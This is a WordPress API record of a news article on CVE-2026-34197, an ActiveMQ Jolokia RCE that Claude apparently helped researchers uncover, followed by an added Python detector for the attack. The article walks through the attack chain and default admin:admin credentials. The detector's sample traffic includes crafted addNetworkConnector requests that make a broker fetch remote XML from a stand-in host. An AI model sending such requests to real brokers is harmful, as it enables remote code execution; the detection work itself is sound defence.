{"id":7777,"date":"2026-04-10T11:39:26","date_gmt":"2026-04-10T11:39:26","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7777"},"modified":"2026-04-10T11:39:26","modified_gmt":"2026-04-10T11:39:26","slug":"claude-uncovers-a-13%e2%80%91year%e2%80%91old-activemq-rce-bug-within-minutes","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7777","title":{"rendered":"Claude uncovers a 13\u2011year\u2011old ActiveMQ RCE bug within minutes"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>Anthropic\u2019s Claude dug up a critical remote code execution (RCE) bug that sat quietly inside Apache ActiveMQ Classic for over a decade.<\/p>\n<p>Researchers at Horizon3.ai say that it only took minutes for their team to work out an exploit chain for the bug with the help of AI. The researcher behind the work, Naveen Sunkavally, described the process as \u201c80% Claude with 20% gift-wrapping by a human.\u201d<\/p>\n<p>The bug, now fixed, could allow an attacker to use ActiveMQ\u2019s Jolokia API to make the server load a malicious configuration file from the internet and execute arbitrary system commands. The issue stems from the integration of multiple components developed independently over time. 
Each component behaves safely in isolation; combined, they allow remote code execution, a cross-component interaction that Sunkavally noted was easier for Claude to spot.<\/p>\n<p>\u201cSomething that would have probably taken me a week manually took Claude 10 minutes,\u201d the researcher said in a blog <a href=\"https:\/\/horizon3.ai\/attack-research\/disclosures\/cve-2026-34197-activemq-rce-jolokia\/\" target=\"_blank\" rel=\"noopener\">post<\/a>.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>Management API flaw allowed full RCE<\/h2>\n<p>The attack chain revolves around ActiveMQ\u2019s management plane. ActiveMQ exposes the Jolokia API at \u201c\/api\/jolokia\/\u201d, allowing authenticated users to invoke broker JMX operations over HTTP. In vulnerable versions, an attacker can abuse operations such as \u201caddNetworkConnector\u201d to pass a crafted connector URI that causes the broker to load configuration from an external source.<\/p>\n<p>By embedding a \u201cbrokerConfig\u201d parameter that points at an attacker-controlled URL, the attacker forces ActiveMQ to fetch and parse a remote Spring XML file. Because Spring XML can instantiate arbitrary beans, that file can run attacker-chosen Java code, including system commands, inside the broker process.<\/p>\n<p>The flaw is tracked as <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-34197\" target=\"_blank\" rel=\"noopener\">CVE-2026-34197<\/a> and carries a high severity rating (CVSS 8.8). It affects ActiveMQ Classic 5.x releases prior to 5.19.4 and 6.x releases prior to 6.2.3.<\/p>\n<p>The exploit requires valid credentials, but Sunkavally pointed out that default credentials such as \u201cadmin:admin\u201d are still widely deployed in real environments. Worse, in certain ActiveMQ 6.x versions, a separate flaw (CVE-2024-32114) can expose the Jolokia API without any authentication.<\/p>\n<p>\u201cIn those versions, CVE-2026-34197 is effectively an unauthenticated RCE,\u201d he said.<\/p>\n<h2 class=\"wp-block-heading\"><a><\/a>AI accelerated discovery<\/h2>\n<p>ActiveMQ has been here before. 
The platform has a track record of high-impact vulnerabilities tied to management surfaces and unsafe assumptions about trusted inputs. From older web console <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2016-3088\" target=\"_blank\" rel=\"noopener\">flaws<\/a> to deserialization <a href=\"https:\/\/www.csoonline.com\/article\/657956\/hellokitty-ransomware-deployed-via-critical-apache-activemq-flaw.html\">bugs<\/a> and protocol-level <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2022-41678\" target=\"_blank\" rel=\"noopener\">RCE<\/a>s, administrative functionality has repeatedly become an attack vector.<\/p>\n<p>But none of the previous flaws were found the way CVE-2026-34197 was. The vulnerable code dates back to around 2012 and sat unnoticed for 13 years before Claude mapped out the multi-step exploit chain.<\/p>\n<p>The discovery also previews the much-discussed successor to Claude\u2019s flaw-finding capabilities, <a href=\"https:\/\/www.csoonline.com\/article\/4151801\/leak-reveals-anthropics-mythos-a-powerful-ai-model-aimed-at-cybersecurity-use-cases.html\">Claude Mythos<\/a>, a vulnerability finder and exploit generator considered so dangerous in the wrong hands that its early preview has been restricted to a handful of companies, with major names from the AI and cybersecurity community coming together under \u201c<a href=\"https:\/\/www.csoonline.com\/article\/4155342\/what-anthropic-glasswing-reveals-about-the-future-of-vulnerability-discovery.html\">Project Glasswing<\/a>\u201d to manage its controlled use.<\/p>\n<p>CVE-2026-34197 has been addressed in newer ActiveMQ Classic releases (6.2.3 and 5.19.4), and users must upgrade to patched versions to be protected. Upgrading does not remove the other half of the risk the researcher highlighted: brokers still using default credentials such as admin:admin, or 6.x builds affected by CVE-2024-32114, should have their credentials changed and the Jolokia endpoint restricted to trusted networks regardless of version.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Anthropic\u2019s Claude dug up a critical remote code execution (RCE) bug that sat quietly inside Apache ActiveMQ Classic for over a decade. 
Researchers at Horizon3.ai say that it only took minutes for their team to work out an exploit chain for the bug with the help of AI. The researcher behind the work, Naveen Sunkavally, [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":7778,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7777","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7777"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7777"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7777\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7778"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7777"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
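As an added example (not code from the article, from Horizon3.ai, or from the ActiveMQ project), the following Python detector scans HTTP requests to the Jolokia endpoint for the pattern the article describes: an `exec` call to `addNetworkConnector` whose connector URI carries a `brokerConfig` parameter that points at a network location. The POST JSON and GET path request shapes follow the public Jolokia protocol; the `static:(tcp://...)?brokerConfig=xbean:http://...` URI layout, the `xbean:` wrapper handling, the sample requests and the IP addresses are constructed for illustration and are not taken from the disclosure.

```python
"""Flag Jolokia requests that call addNetworkConnector with a remote brokerConfig.

Added example for the article above; not the project's or the researcher's code.
"""
import json
import re
from urllib.parse import unquote

JOLOKIA_PREFIX = "/api/jolokia"
BROKER_CONFIG_RE = re.compile(r"brokerConfig=([^&\s\"']+)", re.IGNORECASE)
REMOTE_SCHEMES = {"http", "https", "ftp"}   # fetched over the network by the broker
WRAPPER_PREFIXES = {"xbean"}                # assumption: wrapper form is prefix:inner-uri


def remote_target(value):
    """Return the network URL inside a brokerConfig value, or None if it is local.

    "xbean:http://host/x.xml" unwraps to "http://host/x.xml" (remote);
    "file:/opt/activemq/conf/activemq.xml" and "classpath:activemq.xml" are local.
    """
    v = unquote(value).strip()
    while True:
        scheme, sep, rest = v.partition(":")
        if not sep:
            return None
        scheme = scheme.lower()
        if scheme in REMOTE_SCHEMES:
            return v
        if scheme in WRAPPER_PREFIXES:
            v = rest
            continue
        return None


def _exec_requests(body):
    """Yield (mbean, operation, arguments) for each exec request in a Jolokia POST body.

    Jolokia accepts a single request object or a batch list of them.
    """
    try:
        parsed = json.loads(body)
    except (ValueError, TypeError):
        return
    for req in parsed if isinstance(parsed, list) else [parsed]:
        if isinstance(req, dict) and str(req.get("type", "")).lower() == "exec":
            yield req.get("mbean", ""), str(req.get("operation", "")), req.get("arguments") or []


def scan_request(method, path, body=""):
    """Return findings for one HTTP request (method, path incl. query, body).

    severity 'high': addNetworkConnector with a brokerConfig that resolves to a
    network URL; 'medium': brokerConfig present but local (still a runtime
    reconfiguration of the broker worth investigating).
    """
    findings = []
    if not path.startswith(JOLOKIA_PREFIX):
        return findings
    candidates = []
    if method.upper() == "POST":
        for mbean, op, args in _exec_requests(body):
            # Jolokia also accepts the signature form addNetworkConnector(java.lang.String)
            if op.split("(")[0] == "addNetworkConnector":
                candidates.append((mbean, " ".join(str(a) for a in args)))
    else:
        # GET form: /api/jolokia/exec/<mbean>/<operation>/<args>, usually percent-encoded
        decoded = unquote(path)
        if "/exec/" in decoded and "/addNetworkConnector" in decoded:
            candidates.append(("(mbean taken from GET path)", decoded))
    for mbean, text in candidates:
        for m in BROKER_CONFIG_RE.finditer(unquote(text)):
            target = remote_target(m.group(1))
            findings.append({"mbean": mbean, "brokerConfig": unquote(m.group(1)),
                             "remote": target, "severity": "high" if target else "medium"})
    return findings


SAMPLE_REQUESTS = [  # constructed sample traffic, not captured from a real broker
    ("POST", "/api/jolokia/", json.dumps({
        "type": "exec", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "operation": "addNetworkConnector",
        "arguments": ["static:(tcp://192.0.2.10:61616)?brokerConfig=xbean:http://203.0.113.5/evil.xml"]})),
    ("POST", "/api/jolokia/", json.dumps([{"type": "read", "mbean": "java.lang:type=Memory"}])),
    ("POST", "/api/jolokia/", json.dumps({
        "type": "exec", "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "operation": "addNetworkConnector(java.lang.String)",
        "arguments": ["static:(tcp://192.0.2.11:61616)?brokerConfig=file:/opt/activemq/conf/activemq.xml"]})),
    ("GET", "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/"
            "static:(tcp:%2F%2F192.0.2.12:61616)%3FbrokerConfig%3Dhttp%3A%2F%2F203.0.113.5%2Fx.xml", ""),
]


def scan_all(requests=SAMPLE_REQUESTS):
    """Run scan_request over a list of (method, path, body) tuples; return (index, finding) pairs."""
    return [(i, f) for i, (m, p, b) in enumerate(requests) for f in scan_request(m, p, b)]


if __name__ == "__main__":
    for idx, finding in scan_all():
        print(idx, finding)
```

Feed it `(method, path, body)` tuples from a reverse proxy or WAF that logs request bodies in front of the broker's Jetty listener; a plain access log without bodies only covers the GET form. A `medium` finding still means someone reconfigured a running broker through the management API, which is rarely routine. Detection does not replace the fix: upgrade to 5.19.4 or 6.2.3, replace default credentials, and keep `/api/jolokia/` off untrusted networks.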